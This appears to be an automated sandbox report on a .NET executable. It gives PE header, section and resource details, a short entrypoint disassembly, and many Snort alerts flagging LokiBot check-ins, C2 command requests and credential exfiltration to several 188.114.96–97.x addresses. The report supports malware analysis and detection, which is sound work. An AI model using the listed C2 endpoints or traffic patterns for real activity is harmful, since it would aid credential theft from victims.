Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
dec esp
add byte ptr [edi+00h], ch
popad
add byte ptr [eax+eax+00h], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x969f0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x98000	0x29a4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x94a50	0x94c00	False	0.7955734637605042	data	7.624251253975701	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x98000	0x29a4	0x2a00	False	0.9035528273809523	data	7.67690596368935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9c000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x980c8	0x2511	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON	0x9a5ec	0x14	data
RT_VERSION	0x9a610	0x390	data

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3188.114.97.649751802021641 06/09/22-12:18:53.097950	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49751	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749800802024313 06/09/22-12:20:00.829408	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49800	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749774802825766 06/09/22-12:19:21.474099	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49774	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649824802024313 06/09/22-12:20:22.688767	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49824	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749810802024313 06/09/22-12:20:16.253890	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49810	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649820802825766 06/09/22-12:20:20.867617	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49820	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749770802021641 06/09/22-12:19:14.041674	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49770	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749785802021641 06/09/22-12:19:42.634597	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49785	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749773802024313 06/09/22-12:19:20.082461	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49773	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749767802021641 06/09/22-12:19:08.800960	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49767	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749844802025381 06/09/22-12:20:27.377021	TCP	2025381	ET TROJAN LokiBot Checkin	49844	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749752802021641 06/09/22-12:18:54.883061	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49752	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749793802021641 06/09/22-12:19:50.509118	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49793	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649776802021641 06/09/22-12:19:23.957128	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49776	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749799802025381 06/09/22-12:19:59.356295	TCP	2025381	ET TROJAN LokiBot Checkin	49799	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749804802021641 06/09/22-12:20:07.542975	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49804	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749782802025381 06/09/22-12:19:30.781711	TCP	2025381	ET TROJAN LokiBot Checkin	49782	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649764802024313 06/09/22-12:19:02.212367	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49764	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749798802024313 06/09/22-12:19:58.002191	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49798	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749799802825766 06/09/22-12:19:59.356295	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49799	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749745802024312 06/09/22-12:18:46.752225	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49745	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649820802025381 06/09/22-12:20:20.867617	TCP	2025381	ET TROJAN LokiBot Checkin	49820	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749782802825766 06/09/22-12:19:30.781711	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49782	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749766802025381 06/09/22-12:19:06.967493	TCP	2025381	ET TROJAN LokiBot Checkin	49766	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649775802025381 06/09/22-12:19:22.604146	TCP	2025381	ET TROJAN LokiBot Checkin	49775	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749783802024313 06/09/22-12:19:36.273915	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49783	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749772802025381 06/09/22-12:19:18.470177	TCP	2025381	ET TROJAN LokiBot Checkin	49772	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749797802825766 06/09/22-12:19:56.597737	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49797	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649792802024313 06/09/22-12:19:45.858683	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49792	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749817802024313 06/09/22-12:20:18.206399	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49817	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649778802025381 06/09/22-12:19:26.733758	TCP	2025381	ET TROJAN LokiBot Checkin	49778	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749748802825766 06/09/22-12:18:50.155870	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49748	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649801802021641 06/09/22-12:20:02.469935	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49801	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749803802025381 06/09/22-12:20:05.555366	TCP	2025381	ET TROJAN LokiBot Checkin	49803	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749761802024313 06/09/22-12:18:59.590864	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49761	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749779802025381 06/09/22-12:19:28.006927	TCP	2025381	ET TROJAN LokiBot Checkin	49779	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749796802024313 06/09/22-12:19:54.857506	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49796	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749807802021641 06/09/22-12:20:13.436189	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49807	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749784802825766 06/09/22-12:19:39.004620	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49784	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749832802021641 06/09/22-12:20:23.981118	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49832	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749802802021641 06/09/22-12:20:04.084401	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49802	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749774802025381 06/09/22-12:19:21.474099	TCP	2025381	ET TROJAN LokiBot Checkin	49774	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649771802825766 06/09/22-12:19:17.236324	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49771	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749748802024312 06/09/22-12:18:50.155870	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49748	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749832802025381 06/09/22-12:20:23.981118	TCP	2025381	ET TROJAN LokiBot Checkin	49832	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649751802024313 06/09/22-12:18:53.097950	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49751	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.97.649768802825766 06/09/22-12:19:10.383861	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49768	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749752802025381 06/09/22-12:18:54.883061	TCP	2025381	ET TROJAN LokiBot Checkin	49752	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649776802025381 06/09/22-12:19:23.957128	TCP	2025381	ET TROJAN LokiBot Checkin	49776	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749777802825766 06/09/22-12:19:25.204896	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49777	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749785802024313 06/09/22-12:19:42.634597	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49785	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749770802024313 06/09/22-12:19:14.041674	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49770	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749773802021641 06/09/22-12:19:20.082461	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49773	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749786802825766 06/09/22-12:19:44.361044	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49786	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.749765802825766 06/09/22-12:19:04.748877	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49765	80	192.168.2.3	188.114.97.7
192.168.2.3188.114.96.749767802024313 06/09/22-12:19:08.800960	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49767	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749752802825766 06/09/22-12:18:54.883061	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49752	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649768802021641 06/09/22-12:19:10.383861	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49768	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749800802021641 06/09/22-12:20:00.829408	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49800	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749800802825766 06/09/22-12:20:00.829408	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49800	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.749765802021641 06/09/22-12:19:04.748877	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49765	80	192.168.2.3	188.114.97.7
192.168.2.3188.114.96.749794802025381 06/09/22-12:19:52.723950	TCP	2025381	ET TROJAN LokiBot Checkin	49794	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749745802021641 06/09/22-12:18:46.752225	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749786802024313 06/09/22-12:19:44.361044	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49786	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749774802021641 06/09/22-12:19:21.474099	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49774	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749777802021641 06/09/22-12:19:25.204896	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49777	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749819802825766 06/09/22-12:20:19.468606	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49819	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749769802025381 06/09/22-12:19:11.569140	TCP	2025381	ET TROJAN LokiBot Checkin	49769	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749805802024313 06/09/22-12:20:10.598374	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49805	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749784802025381 06/09/22-12:19:39.004620	TCP	2025381	ET TROJAN LokiBot Checkin	49784	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649771802021641 06/09/22-12:19:17.236324	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49771	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.97.649778802825766 06/09/22-12:19:26.733758	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49778	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749799802021641 06/09/22-12:19:59.356295	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49799	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649824802025381 06/09/22-12:20:22.688767	TCP	2025381	ET TROJAN LokiBot Checkin	49824	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.97.649775802825766 06/09/22-12:19:22.604146	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49775	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749803802825766 06/09/22-12:20:05.555366	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49803	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749810802025381 06/09/22-12:20:16.253890	TCP	2025381	ET TROJAN LokiBot Checkin	49810	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749796802021641 06/09/22-12:19:54.857506	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49796	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749761802021641 06/09/22-12:18:59.590864	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49761	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749804802025381 06/09/22-12:20:07.542975	TCP	2025381	ET TROJAN LokiBot Checkin	49804	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749844802021641 06/09/22-12:20:27.377021	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49844	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749844802825766 06/09/22-12:20:27.377021	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49844	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749851802025381 06/09/22-12:20:29.327641	TCP	2025381	ET TROJAN LokiBot Checkin	49851	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749819802021641 06/09/22-12:20:19.468606	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49819	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749797802025381 06/09/22-12:19:56.597737	TCP	2025381	ET TROJAN LokiBot Checkin	49797	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749761802825766 06/09/22-12:18:59.590864	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49761	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749796802825766 06/09/22-12:19:54.857506	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49796	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649778802021641 06/09/22-12:19:26.733758	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49778	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749783802021641 06/09/22-12:19:36.273915	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49783	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749839802025381 06/09/22-12:20:25.206676	TCP	2025381	ET TROJAN LokiBot Checkin	49839	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749802802024313 06/09/22-12:20:04.084401	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49802	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749798802025381 06/09/22-12:19:58.002191	TCP	2025381	ET TROJAN LokiBot Checkin	49798	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749748802021641 06/09/22-12:18:50.155870	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49748	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649778802024313 06/09/22-12:19:26.733758	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49778	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749797802024313 06/09/22-12:19:56.597737	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49797	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749794802021641 06/09/22-12:19:52.723950	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49794	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749769802024313 06/09/22-12:19:11.569140	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49769	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749782802024313 06/09/22-12:19:30.781711	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49782	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749783802825766 06/09/22-12:19:36.273915	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49783	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749803802021641 06/09/22-12:20:05.555366	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49803	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649764802025381 06/09/22-12:19:02.212367	TCP	2025381	ET TROJAN LokiBot Checkin	49764	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749817802025381 06/09/22-12:20:18.206399	TCP	2025381	ET TROJAN LokiBot Checkin	49817	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649801802025381 06/09/22-12:20:02.469935	TCP	2025381	ET TROJAN LokiBot Checkin	49801	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749802802825766 06/09/22-12:20:04.084401	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49802	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749798802825766 06/09/22-12:19:58.002191	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49798	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749779802024313 06/09/22-12:19:28.006927	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49779	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749839802024313 06/09/22-12:20:25.206676	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49839	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649768802024313 06/09/22-12:19:10.383861	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49768	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749817802825766 06/09/22-12:20:18.206399	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49817	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649764802825766 06/09/22-12:19:02.212367	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49764	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749802802025381 06/09/22-12:20:04.084401	TCP	2025381	ET TROJAN LokiBot Checkin	49802	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749793802825766 06/09/22-12:19:50.509118	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49793	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.749765802024313 06/09/22-12:19:04.748877	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49765	80	192.168.2.3	188.114.97.7
192.168.2.3188.114.96.749786802021641 06/09/22-12:19:44.361044	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49786	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649801802825766 06/09/22-12:20:02.469935	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49801	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749783802025381 06/09/22-12:19:36.273915	TCP	2025381	ET TROJAN LokiBot Checkin	49783	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749807802025381 06/09/22-12:20:13.436189	TCP	2025381	ET TROJAN LokiBot Checkin	49807	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649775802021641 06/09/22-12:19:22.604146	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49775	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749777802024313 06/09/22-12:19:25.204896	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49777	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749800802025381 06/09/22-12:20:00.829408	TCP	2025381	ET TROJAN LokiBot Checkin	49800	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749805802021641 06/09/22-12:20:10.598374	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49805	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749810802825766 06/09/22-12:20:16.253890	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49810	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649820802021641 06/09/22-12:20:20.867617	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49820	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749774802024313 06/09/22-12:19:21.474099	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49774	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749770802825766 06/09/22-12:19:14.041674	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49770	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749807802825766 06/09/22-12:20:13.436189	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49807	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749804802825766 06/09/22-12:20:07.542975	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49804	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749745802825766 06/09/22-12:18:46.752225	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49745	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649771802024313 06/09/22-12:19:17.236324	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49771	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749851802021641 06/09/22-12:20:29.327641	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49851	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749844802024313 06/09/22-12:20:27.377021	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49844	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749793802025381 06/09/22-12:19:50.509118	TCP	2025381	ET TROJAN LokiBot Checkin	49793	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749796802025381 06/09/22-12:19:54.857506	TCP	2025381	ET TROJAN LokiBot Checkin	49796	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749799802024313 06/09/22-12:19:59.356295	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49799	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749832802825766 06/09/22-12:20:23.981118	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49832	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749784802021641 06/09/22-12:19:39.004620	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49784	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749785802025381 06/09/22-12:19:42.634597	TCP	2025381	ET TROJAN LokiBot Checkin	49785	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749805802025381 06/09/22-12:20:10.598374	TCP	2025381	ET TROJAN LokiBot Checkin	49805	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749766802024313 06/09/22-12:19:06.967493	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49766	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649751802025381 06/09/22-12:18:53.097950	TCP	2025381	ET TROJAN LokiBot Checkin	49751	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749772802024313 06/09/22-12:19:18.470177	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49772	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.97.649792802025381 06/09/22-12:19:45.858683	TCP	2025381	ET TROJAN LokiBot Checkin	49792	80	192.168.2.3	188.114.97.6
192.168.2.3188.114.96.749767802825766 06/09/22-12:19:08.800960	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49767	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749819802024313 06/09/22-12:20:19.468606	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49819	80	192.168.2.3	188.114.96.7
192.168.2.3188.114.96.749773802825766 06/09/22-12:19:20.082461	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49773	80	192.168.2.3	188.114.96.7
